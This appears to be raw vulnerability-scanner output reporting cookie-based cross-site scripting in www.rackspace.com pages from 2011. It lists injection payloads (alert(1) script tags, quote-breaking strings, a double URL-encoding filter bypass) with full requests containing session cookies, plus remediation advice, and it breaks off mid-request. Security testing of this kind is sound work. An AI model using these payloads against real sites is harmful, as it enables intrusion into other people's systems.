The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb61%2527%253b55e54a5fd76 was submitted in the IS_UASrackuid cookie. This input was echoed as acb61';55e54a5fd76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/submit_idea/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8acb61%2527%253b55e54a5fd76; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8ce%2527%253b66f9e5851f6 was submitted in the IS_UASrackuid cookie. This input was echoed as 8a8ce';66f9e5851f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/why_hosted_apps/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88a8ce%2527%253b66f9e5851f6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b90</script><script>alert(1)</script>389e15e9f43 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f838b90</script><script>alert(1)</script>389e15e9f43; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75562"><script>alert(1)</script>f69340a5b40 was submitted in the IS_UASrackuid cookie. This input was echoed as 75562\"><script>alert(1)</script>f69340a5b40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f875562"><script>alert(1)</script>f69340a5b40; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cc34"><script>alert(1)</script>66af845bb84 was submitted in the chatslider cookie. This input was echoed as 4cc34\"><script>alert(1)</script>66af845bb84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4cc34"><script>alert(1)</script>66af845bb84; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f920</script><script>alert(1)</script>b9c12074700 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1f920</script><script>alert(1)</script>b9c12074700; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6b2"><script>alert(1)</script>2f6e48ded08 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blogs/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ed6b2"><script>alert(1)</script>2f6e48ded08; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58bc9"%3balert(1)//56d204ef69d was submitted in the IS_UASrackuid cookie. This input was echoed as 58bc9";alert(1)//56d204ef69d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f858bc9"%3balert(1)//56d204ef69d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:46:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44884
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a72"><script>alert(1)</script>057e8ea858f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blogs/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De5a72"><script>alert(1)</script>057e8ea858f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30478"%3balert(1)//e5749b93858 was submitted in the chatslider cookie. This input was echoed as 30478";alert(1)//e5749b93858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D30478"%3balert(1)//e5749b93858; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45b6"><script>alert(1)</script>9ffadb1af61 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /crossdomain.xml HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b45b6"><script>alert(1)</script>9ffadb1af61; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a56ad"%3balert(1)//641f8ea2c6e was submitted in the IS_UASrackuid cookie. This input was echoed as a56ad";alert(1)//641f8ea2c6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a56ad"%3balert(1)//641f8ea2c6e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:46:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 35526
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6fc3"><script>alert(1)</script>e0a31e74b6e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /crossdomain.xml HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
